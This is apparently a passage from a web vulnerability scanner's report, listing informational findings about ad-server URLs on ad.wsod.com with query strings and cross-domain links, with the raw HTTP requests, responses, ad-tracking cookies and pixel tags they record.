
http://segments.adap.tv/data/?p=cadreon&type=gif&segment=11&add=true
http://segments.adap.tv/data/?p=cadreon&type=gif&segment=21&add=true
http://segments.adap.tv/data/?p=cadreon&type=gif&segment=23&add=true

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Wed, 15 Jun 2011 11:02:07 GMT
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=Cwq2GXGZMei0H6QRLFUWcgEzref2sQrvavFxeBByhwbG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ-Lq_12Rg25xtn3uTjSRzNjtIdlZav5LCaukNdINLIBPOFzb2lfSb2leKU62lyfe6oZUfy3cXERUlCbqf8bsFRDyIaTFIkAhb3O3_LfSj2D5zTu1xTABVuNBEjnQ7vQQlPwyqQd2kbcK6pvFQq-teAoLiST7x1GpJOjqaN2tR5kAYMps0hV4AuinP3IuoTyqBob-2qV2PRWg1D8SUwxYaEQFd8HpXzvs6OGZs9MqVMapxkzutrtWP-qhB9OfJQcvYHUbCLOdCASkmpn5H1zQiGL1mTvlVxq4kSctfknExbayqdAXWOgJeSF4J0CON8b5QZmdIlwYAD9OSKKN3Z7fa4Ifz6137vw1WRoGbxwsKWSnA2zovzUc76Tv1dBxqAuUWLbTNinx2VfUPWZEdO2Vy9VPvIk4l7uU-O46_JSAKJSaUIgjS9UzEBdyqIWT0SRhTjl3nZWj9DidA81bJpnYNWrizMSpzYJMZtxpnUFnah6riFwjJqLCroXwt55DUqJ9OxUiaJvJ3P8PjM_9LgSzB03-UDfgeKp_OSq1jV5EcY62jNnGwcm-v2Nc9ZUxrI5bArbFa4PhhzaWR_KoZyJmYtXKTCkVOSP7aMISPsMA-5rYZ6569AsLsth-iaBhgN4Y6oZUfy3cXERUlCbqf8bsFRCBoYnFScze6h4OQ8WDVtdszTu1xTABVuNBEjnQ7vQQlNsVabdjKJKhhCPvL4EA7VcHuAqFwiZZMCmLrNGrJ0WgYMps0hV4AuinP3IuoTyqBsa_PVtoNyD9YpIYrkswKlAFd8HpXzvs6OGZs9MqVMapM5v7pjR5GrWmy9D1ZMBDCPNm3FpXWJpPS8Rd_pZlWzvwMzO6hvz2FFiqch_RNwsPdqdyfXiXadvcoLjJc7MOB5mdIlwYAD9OSKKN3Z7fa4LkQL8LG1Xswle8pfz9MJgEQXxGYeBYfEO7xs5kfkscQ7bTNinx2VfUPWZEdO2Vy9XUc2wNpvMvPpne776QsqUDf_554SpIK3huzkg3GmVfA5mKdG9wfEgTrZ_HpdUxB4dqNvAVr3IxjVMU-dESpumxPmlnE2DerArFS73waNvuuw-VNoXnxHFwCUybMxiGRez-UDfgeKp_OSq1jV5EcY622S2W6vMqZ73lnXroBZZCIJlmoAI3Z7CCJpRgIdqQc9gLvfxtEfIP3Mgu2HVCMyT6fVMpRA9COvxPm9GhrTVpFEJedvFh7IcKMPUZKG4a25Wjp4-4VHiVBWhL8kZTTHUEEZYjqWmNkbYMJXxYwXP0ivAhMyG7WiBdMtmZpxmib65elynrVX8L3tctyWPQ981dRhSgyH_YKyzwaHs2OOwPKnlcd_rDI1guq3jW_XwqTcptUMsF14GuE97T3OQgmtAND1aJVVaBwrOt4alj6Rzt3asNA2mupPotO89J1M7GQCdYA6mZQORv9NCOuHD8W8Pvw2E0XpC8MoXcUC9EvLIqDJ81dnOBqEIp9UcyJdU0s2dZNadKv1nmwVh0nQMBiUozDyDUfzSD4FrO8H9TmnOs2Fy1WnPRG1FVm_158R84SQUDDvn5qzXJjLZ8wMOpH2VUidMby9e0xx7EjmD_qe07bBW51WNe_vXSrH8j3OikfOix0YnsBLVPpvnCKqaSleld2e3m3LW2izkTUCvyig6f_Eclre2oYPrXXUlbckOsOzfRHfKboHgAiyeCSD5Se3Dt56JQiT9BBtDU5zYNi_NmUreJTf9EU_tOkHRKVO8_mZbQn_ugqOPPFtBuaLGREhiwAxwF5V3jVoK_k0gd7-0t-3eGamYwoDBKdRj9ba9srGKI4cyR91DkfUnGp4CZ2XEUoJZsEQUz1fHuz4KOaEydExDOy-LVKsTbwD47PQ_oY1hwd2q0YscxgOJlsuZESQbJ8HwN9NuhIP_XkX8rtxuP1vl02wF4SENfz2Fj675JocuLm7OAT5SFH2tFhbfFwaSAApIOivosg1964XuUP-GJuvlylYdlQism6wYOEgBb5mpARyrnCVTyHMraYxPOz8XD_c4CB9kh1yXHfva0bF4OdGSzW48YkHeAOVnkOQhtDEIT-1TinU9HRCvu0Gtkelb7fNXObEOkeVNzBQV4WNG7kjfx8tr60k9qg9ATsnYoAeYFeILKS7IQkEsa_85wHumQH0xMx7s4D1jmw4B16C4dfLDNJ-gPuRisqlbSj9DSEz6LzaeaxPegNDw7D2m29-GigZE992_yjCE9D1lgk4BbLcqppQh5sKeMuo2J2dJ0h1G9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIVYDsGs8HA9ebgXcdSEZwfKe3Y57IiZneII5Ka6gzHwRfJJa1hX06djW9VmjlVrjyXySWtYV9OnY1vVZo5Va48l8klrWFfTp2Nb1WaOVWuPLF4I5dA1vXKb0IGHGC-Ole5vLq95iSQ2aeieaQBbTOIuby6veYkkNmnonmkAW0ziLm8ur3mJJDZp6J5pAFtM4iS8drDvH2GHnX7T1P8D_iX1ra1gA5Wy-ov38a7zRUR_Fn3VEss7RQ9Tyo1qT5AwESaWr1xXE0MIDwS9tWvxZrnGhxCyOEwJ6UEOxJDdP_5dhocQsjhMCelBDsSQ3T_-XYaHELI4TAnpQQ7EkN0__l2LzzRIHgCvOQow5SgLAWHHexSsvN7MDtJFV6wRit1nx5; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
Set-Cookie: fc=GNnbBD3qiHnaSVYBbCSNLvLBUhuH6wslcqkNHBZUaKb7Nj5bGHqXk2A06xn0orl8mNEYHvmDrveO6RDJcMVxDYiks48zuVvaWDQAx0VVo3zPum_b70FfKpk3ju4oVkvZHC9go-mOaxov-BH8bOfKSItsuggz1E_U4uiXlRjdb9A78oQh5uLMFfvKDXObt_rS1aeprWaIP6vaZTV9xdfPWhdQ9SbRVPlctyZfmBFwploXR8qslufNm6r8H5hh1jnufuj8s2SsJjw03czPperUqzHVjXTBrUPRIETuoZhexzc; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
Set-Cookie: pf=3R3SKUUPFCoio1bGZvjNrz90sCTbjJoMGNRY49lN3lkdCPfTl6GVwLxMGMWABO2Hxhx5ALNZJagJ4MhMImSgO1j9Fw_ghz_PVAPwGCUX-93yzKimGqsD0iB4nMRqsP7Fo2p_sYe6FK71YFv8XCcCotMv9o6pa5vGMMnD4OdosTAdkTDGhgbOPz347HKULaPudC7UMMqtU-uTINCqeO5OuEL9QOcm54oK_vUb9hh6U2buGh5RH_9bIiRxjGlPA1strChLkPILqDevF3_ytWn-kDXnP7WTJzn5hC7GC86BA-XH4AovFAW5wYg3d6HNexkTzFpNF3hh_ymVCgGfBkee1knPZNXIe9A8BgTIbvpehe-k2s4kcWWbQbjBvv9DiSP3qKDEyZKkj9qg203fyq2TFtojUIBz8h_-Icn9K-ai00y2wJhpV1cKL0hO0j9B54GVhm47us_Csn3kHJ43JP-qHSBc4w9COMv7vDAXkl7P7uNQSKyLC2RsYFceW-v9Ivp_YD2RLpMpzj0AYE_Zac9hK_NAdWBQHVl-JPRF5hS10YO-4pC3ilKbQpP5MzC5Uc_kTeP1VDFWEeG9aPxYlZoS7h6d7CFXLgzFaAgYaTkStmC-QV4C2xn7TxBeOjVll9oOUmyWQqI6LTbGJiqxEuhQYn8rJzZ-n49wBvicimKkWWRsjPuConU0rTmVj5rk3Zs478f5w22ir_fCTLujc_dkGDf0XNwyIx4tuYj5ActmcnGU_ut7QWRoiVW-tzSSU50x81pN6PeKUPuttBCxxLR0bEXGPVB-KlOMchJXjiQA7q3qw9rqhVwrLsR04UQUf7H1SHNsnfeE9yPoFSHW8Ezu0u0_r320et_4BxanRu3aW6Od71gQ6z-o93xNve-0ihCBKuKRbYoeHkykGEWzpMqgE9YnGohfIt52_gTsgQl00yAdh_1PkFeE4BUm4Q3ZCHxVw0-Ht2JclSnzBdXwhsQ8i70yFd1p7EY1gmjobjhbl8py5vR-6hrOrfCxLuN-5IAUz5HNvuzTEFxauVGTueM8Vp8as4FPdyDpeeEni4cNLaW7CdLTrgTa3qKWD-Da3R0DjXbBpZz989wk0yGmAtqC-6oLvpO-g-SUTn1I2hqfIKAwJ3K0R_C6aRCJA-6dRcmmRsm2dg998jlQIlrO-XAkIu866aiXxhF5vdmmj1Eq8cbMUvEoglbvObqHTXsaSeX3eyilQCKGOvUGrC3yg6quWbT2J4_FGa1rnHzs2HLwdHSIZhxNbxZ4Mnp1HWQFNlPcrJU_yok8WE0ucKkz3qneksiNhOxeYM51PbZBqQ7Z19PwLp1_APilk3LxHIqi5G66d8e_Z2cttmvTBWPAwvjWXHUfoLAQIZBbvbOhN6bREB_SWupoTcy14leZYRR7uP8E2pWNOdbM6oDzpMYKXjYhY4TLX48ZxcpEi0fIE7tOoo9uHkNvFNmNnM23DFeCFVuTjHka8m_2046CrJExuL1gg3GmsPZlMaV4X8N_6aHpYtroERlavtLZfEjz7mA1A0AfxCzqqnQSvo_Cvx-wKsT0cw; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:02:07 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:02:06 GMT
Content-Length: 10252

var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
<span style="display: none">\n                    <img height="1" width="1" style="border-style:none;" alt="" src="http://segments.adap.tv/data/?p=cadreon&type=gif&segment=23&add=true"/> \n                    <img height="1" width="1" style="border-style:none;" alt="" src="http://segments.adap.tv/data/?p=cadreon&type=gif&segment=11&add=true"/> \n                    <img border="0" src="http://r.turn.com/r/beacon?b2=dgreSKR1l3-fFqwVrhKk2fFaNoS5G6K4DRLGa89Io1jPVx7awJtIT5bFbQ7adJJ3pFdSCXahzXLc-TDDfVb0Sw&cid="> \n                    <img height="1" width="1" style="border-style:none;" alt="" src="http://segments.adap.tv/data/?p=cadreon&type=gif&segment=21&add=true"/> \n                </span>
...[SNIP]...

18.64. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*

The response contains the following link to another domain:

http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*http:/ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.051183416275307536?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 12:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2419

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.img.200x33/1307967073**;" />
...[SNIP]...

18.65. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131?click=http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*

The response contains the following link to another domain:

http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*http:/ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.6281025498174131?click=http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 13:11:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2419

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15lg50rvp/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307977872/L=niPRL2KL8NLm3NorTdAdCwmTrcHW8032DHAABSzG/B=BQlNDWKL5Rc-/J=1307970672373026/K=DMPXuK5kN6E_8iwMoxBYgQ/A=6304414/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.img.200x33/1307970673**;" />
...[SNIP]...

18.66. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*

The response contains the following link to another domain:

http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*http:/ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/0.8921072278171778?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://my.yahoo.com/;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i_34=8:42:26:7:0:43835:1307361203:B2; u=4dce55b134194; i_1=33:1411:1148:100:0:43835:1307361371:B2|33:353:198:141:0:43835:1307361205:B2|33:1391:835:0:0:43835:1307361203:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 13 Jun 2011 11:20:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2419

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<NOSCRIPT><a href="http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/" target="_blank" border="0" style="border:0px;"><img border="0" style="border:0px;" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.img.200x33/1307964002**;" />
...[SNIP]...

18.67. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307963455**;10,3,181;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F%3B_ylt%3DAtqNTgBHv4UdcezC5xaY6tfTjdIF?click=http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*

The response contains the following link to another domain:

http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*http:/ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.269.iframe.200x33/**;10.3181;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF

Request

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 13 Jun 2011 11:20:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4dce55b134194; expires=Thu, 14-Jul-2011 11:20:04 GMT; path=/
Set-Cookie: i_1=46:1354:269:44:0:48594:1307964004:L|46:1354:804:44:0:48594:1307963457:L|33:1411:1148:100:0:43835:1307361371:B2; expires=Thu, 14-Jul-2011 11:20:04 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 743

function wsod_image1354() {
document.write('<a href="http://global.ard.yahoo.com/SIG=15lksbmi2/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307970640/L=zR1T7mKL8NLm3NorTdAdCwOlrcHW80318C8ABmgZ/B=XlBgBWKL5Sc-/J=1307963440510261/K=HH7rK3zip4GobWLoj7I2TQ/A=6304414/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.269.iframe.200x33/**;10.3181;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF" target="_blank" title="Online $7 Trades! Click to find out more!"><img style="border:none;" src="http://admedia.wsod.com/media/8bec9b10877d5d7fd7c0fb6e6a631357/200x33_7_dNL.gif" alt="Online $7 Trades! Click to find out more!" />
...[SNIP]...

18.68. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**

Issue detail

The page was loaded from a URL containing a query string:

http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307967073**;10,3,181;1920;1200;http%3A_@2F_@2Fmy.yahoo.com_@2F%3B_ylt%3DAtqNTgBHv4UdcezC5xaY6tfTjdIF?click=http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*

The response contains the following link to another domain:

http://global.ard.yahoo.com/SIG=15l3jj0nv/M=791401.14523132.14352887.12989431/D=my/S=150001785:RQ/Y=YAHOO/EXP=1307974272/L=YlhpiWKL8NLm3NorTdAdCwEYrcHW8031_mAAARvc/B=DWfoD2KL5SI-/J=1307967072104796/K=D58NAeICbmFt09vHRFS7Sg/A=6304414/R=0/*http:/ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1354.804.iframe.200x33/**;10.3181;1920;1200;http:_@2F_@2Fmy.yahoo.com_@2F;_ylt=AtqNTgBHv4UdcezC5xaY6tfTjdIF

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 12:11:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4dce55b134194; expires=Thu, 14-Jul-2011 12:11:14 GMT; path=/
Set-Cookie: i_1=46:1354:804:44:0:44375:1307967074:B2|46:1354:804:44:0:44375:1307967073:B2|46:1354:804:44:0:48594:1307963457:L; expires=Thu, 14-Jul-2011 12:11:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 746

function wsod_image1354() {
